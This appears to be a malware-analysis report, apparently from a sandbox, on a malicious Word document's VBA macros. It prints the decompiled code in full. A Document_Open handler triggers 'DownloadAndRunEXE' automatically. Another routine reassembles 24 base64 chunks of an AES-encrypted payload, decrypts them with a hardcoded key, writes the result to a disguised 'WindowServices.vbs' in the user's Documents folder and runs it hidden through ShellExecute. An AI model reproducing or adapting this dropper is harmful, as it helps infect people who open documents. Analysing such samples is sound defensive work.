          "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"
          "USERPROFILE"
          "Shell.Application"
          """"
          "open"
          LineInstructionMeta Information
          10

          Public Sub ikwiwiejs_19293_Ade()

          11

          Dim key as String

          12

          Dim decryptedText as String

          13

          Dim i as Integer

          14

          Dim parts(1 To 60) as String

          15

          Dim Oekksoioa_ as String

          16

          Dim chunkSize as Integer

          17

          Dim tempFilePath as String

          20

          key = "Bnshekao@3123989942"

          21

          part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"

          22

          part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"

          23

          part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"

          24

          part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"

          25

          part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"

          26

          part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"

          27

          part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"

          28

          part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"

          29

          part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"

          30

          part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"

          31

          part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"

          32

          part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"

          33

          part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"

          34

          part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"

          35

          part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"

          36

          part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"

          37

          part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"

          38

          part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"

          39

          part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"

          40

          part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"

          41

          part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"

          42

          part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"

          43

          part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"

          44

          part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"

          45

          Dim encryptedText as String

          46

          encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24

          47

          decryptedText = AesDecryptString(encryptedText, key)

          50

          chunkSize = 3000

          51

          Dim outputFilePath as String

          53

          vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"

          Environ

          56

          Open vbsFilePath For Output As # 1

          Open

          57

          For i = 1 To Len(decryptedText) Step chunkSize

          Len

          58

          partText = Mid(decryptedText, i, chunkSize)

          Mid

          59

          Print # 1, partText

          60

          Next i

          Len

          61

          Close # 1

          63

          Dim shell as Object

          64

          Set shell = CreateObject("Shell.Application")

          CreateObject

          67

          shell.ShellExecute vbsFilePath, "", "", "open", 0

          ShellExecute

          71

          End Sub

          LineInstructionMeta Information
          73

          Private Sub Class_Initialize()

          75

          End Sub

          Module: ksksksksksksks

          Declaration
          LineContent
          1

          Attribute VB_Name = "ksksksksksksks"

          2

          Attribute VB_Base = "1Normal.ThisDocument"

          3

          Attribute VB_GlobalNameSpace = False

          4

          Attribute VB_Creatable = False

          5

          Attribute VB_PredeclaredId = True

          6

          Attribute VB_Exposed = True

          7

          Attribute VB_TemplateDerived = True

          8

          Attribute VB_Customizable = True

          APIsMeta Information

          OnTime

          Now

          TimeValue

          StringsDecrypted Strings
          "DownloadAndRunEXE"
          LineInstructionMeta Information
          9

          Private Sub Document_Open()

          10

          Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"

          OnTime

          Now

          TimeValue

          11

          End Sub

          Reset < >